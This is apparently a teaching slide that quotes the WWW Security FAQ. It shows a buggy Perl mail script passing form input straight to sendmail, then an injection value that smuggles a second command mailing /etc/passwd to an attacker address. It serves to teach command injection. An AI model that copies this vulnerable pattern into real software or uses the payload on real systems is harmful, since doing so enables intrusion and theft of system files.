Example: Buggy “Mail” Script
$mail_to = &get_name_from_input; # read the address from form
open (MAIL,"| /usr/lib/sendmail $mail_to");
print MAIL "To: $mailto\nFrom: me\n\nHi there!\n";
What if the user submits this as the destination?
nobody@nowhere.com;mail badguys@hell.org</etc/passwd;
(example taken from WWW Security FAQ)